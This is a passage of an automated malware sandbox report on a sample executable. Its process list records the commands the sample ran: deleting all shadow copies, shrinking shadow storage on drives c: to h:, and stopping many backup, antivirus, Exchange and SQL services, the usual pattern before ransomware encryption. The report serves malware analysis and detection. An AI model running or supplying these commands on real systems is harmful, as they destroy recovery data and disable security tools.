N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2412 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2620 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2620 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2612 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2612 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3440 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3440 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 400 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 400 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 400 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 948 wrote to memory of 2912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 948 wrote to memory of 2912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 948 wrote to memory of 2912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 864 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 864 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 864 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3956 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3956 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3976 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3976 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2856 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2856 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3856 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3856 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3856 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3456 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

